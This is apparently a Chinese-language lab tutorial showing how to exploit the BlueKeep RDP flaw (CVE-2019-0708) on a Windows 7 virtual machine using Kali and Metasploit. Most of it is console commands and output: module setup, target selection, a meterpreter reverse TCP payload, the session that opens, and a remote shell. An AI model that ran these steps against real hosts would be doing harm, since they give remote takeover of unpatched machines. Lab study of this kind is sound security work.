渗透测试之Kali如何利用CVE-2019-0708漏洞渗透Win7

环境：

1.攻击者IP：192.168.1.10
系统: KALI2022（vmware 16.0）

2.靶机IP：192.168.1.8
系统：Windows 7 6.1.7601 Service Pack 1 Build 7601
已开启远程协助RDP服务开启了3389端口

问题描述：

KALI 如何利用CVE-2019-0708漏洞渗透Win7

解决方案：

1.打开kali，msf搜索cve_2019_0708

exploit/windows/rdp/cve_2019_0708_bluekeep_rce

2.使用该模块exploit/windows/rdp/cve_2019_0708_bluekeep_rce模块

msf6 > use exploit/windows/rdp/cve_2019_0708_bluekeep_rce 
[*] Using configured payload windows/x64/meterpreter/reverse_tcp
msf6 exploit(windows/rdp

3.查看目标
/cve_2019_0708_bluekeep_rce) > show targets （查看目标）

Exploit targets:

   Id  Name
   --  ----
   0   Automatic targeting via fingerprinting
   1   Windows 7 SP1 / 2008 R2 (6.1.7601 x64)
   2   Windows 7 SP1 / 2008 R2 (6.1.7601 x64 - Virtualbox 6)
   3   Windows 7 SP1 / 2008 R2 (6.1.7601 x64 - VMWare 14)
   4   Windows 7 SP1 / 2008 R2 (6.1.7601 x64 - VMWare 15)
   5   Windows 7 SP1 / 2008 R2 (6.1.7601 x64 - VMWare 15.1)
   6   Windows 7 SP1 / 2008 R2 (6.1.7601 x64 - Hyper-V)
   7   Windows 7 SP1 / 2008 R2 (6.1.7601 x64 - AWS)
   8   Windows 7 SP1 / 2008 R2 (6.1.7601 x64 - QEMU/KVM)

4.查看配置
msf6 exploit(windows/rdp/cve_2019_0708_bluekeep_rce) > options （查看配置）

Module options (exploit/windows/rdp/cve_2019_0708_bluekeep_rce):

   Name             Current Setting  Required  Description
   ----             ---------------  --------  -----------
   RDP_CLIENT_IP    192.168.0.100    yes       The client IPv4 address to report during connect
   RDP_CLIENT_NAME  ethdev           no        The client computer name to report during connect, UNSET = random
   RDP_DOMAIN                        no        The client domain name to report during connect
   RDP_USER                          no        The username to report during connect, UNSET = random
   RHOSTS           192.168.1.8    yes       The target host(s), see https://github.com/rapid7/metasploit-framework/wiki/Using-Metasploit
   RPORT            3389             yes       The target port (TCP)


Payload options (windows/x64/meterpreter/reverse_tcp):

   Name      Current Setting  Required  Description
   ----      ---------------  --------  -----------
   EXITFUNC  thread           yes       Exit technique (Accepted: '', seh, thread, process, none)
   LHOST     192.168.1.10   yes       The listen address (an interface may be specified)
   LPORT     4444             yes       The listen port


Exploit target:

   Id  Name
   --  ----
   0   Automatic targeting via fingerprinting

5.运行
msf6 exploit(windows/rdp/cve_2019_0708_bluekeep_rce) > run（开始运行）

[*] Started reverse TCP handler on 192.168.1.10:4444 
[*] 192.168.1.8:3389 - Running automatic check ("set AutoCheck false" to disable)
[*] 192.168.1.8:3389 - Using auxiliary/scanner/rdp/cve_2019_0708_bluekeep as check
[+] 192.168.1.8:3389    - The target is vulnerable. The target attempted cleanup of the incorrectly-bound MS_T120 channel.
[*] 192.168.1.8:3389    - Scanned 1 of 1 hosts (100% complete)
[+] 192.168.1.8:3389 - The target is vulnerable. The target attempted cleanup of the incorrectly-bound MS_T120 channel.
[-] 192.168.1.8:3389 - Exploit aborted due to failure: bad-config: Set the most appropriate target manually. If you are targeting 2008, make sure fDisableCam=0 !
[*] Exploit completed, but no session was created.

再来一次
msf6 exploit(windows/rdp/cve_2019_0708_bluekeep_rce) > set target 2
target => 2
msf6 exploit(windows/rdp/cve_2019_0708_bluekeep_rce) > run

[*] Started reverse TCP handler on 192.168.1.10:4444 
[*] 192.168.1.8:3389 - Running automatic check ("set AutoCheck false" to disable)
[*] 192.168.1.8:3389 - Using auxiliary/scanner/rdp/cve_2019_0708_bluekeep as check
[+] 192.168.1.8:3389    - The target is vulnerable. The target attempted cleanup of the incorrectly-bound MS_T120 channel.
[*] 192.168.1.8:3389    - Scanned 1 of 1 hosts (100% complete)
[+] 192.168.1.8:3389 - The target is vulnerable. The target attempted cleanup of the incorrectly-bound MS_T120 channel.
[*] 192.168.1.8:3389 - Using CHUNK grooming strategy. Size 250MB, target address 0xfffffa8011e07000, Channel count 1.
[!] 192.168.1.8:3389 - <---------------- | Entering Danger Zone | ---------------->
[*] 192.168.1.8:3389 - Surfing channels ...
[*] 192.168.1.8:3389 - Lobbing eggs ...
[*] 192.168.1.8:3389 - Forcing the USE of FREE'd object ...
[!] 192.168.1.8:3389 - <---------------- | Leaving Danger Zone | ---------------->
[*] Sending stage (200262 bytes) to 192.168.1.8
[*] Meterpreter session 1 opened (192.168.1.10:4444 -> 192.168.1.8:49214 ) at 2022-10-01 05:04:38 -0400

6.成功拿到shell

meterpreter > shell
Process 4452 created.
Channel 1 created.
Microsoft Windows [�汾 6.1.7601]
��?���� (c) 2009 Microsoft Corporation����������?����

7.查看靶机信息
C:\Windows\system32>systeminfo
systeminfo

������:           USER-20191228PM
OS ����:          Microsoft Windows 7 �?�� 
OS �汾:          6.1.7601 Service Pack 1 Build 7601
OS ������:        Microsoft Corporation
OS ����:          ��������?

8.本次渗透完成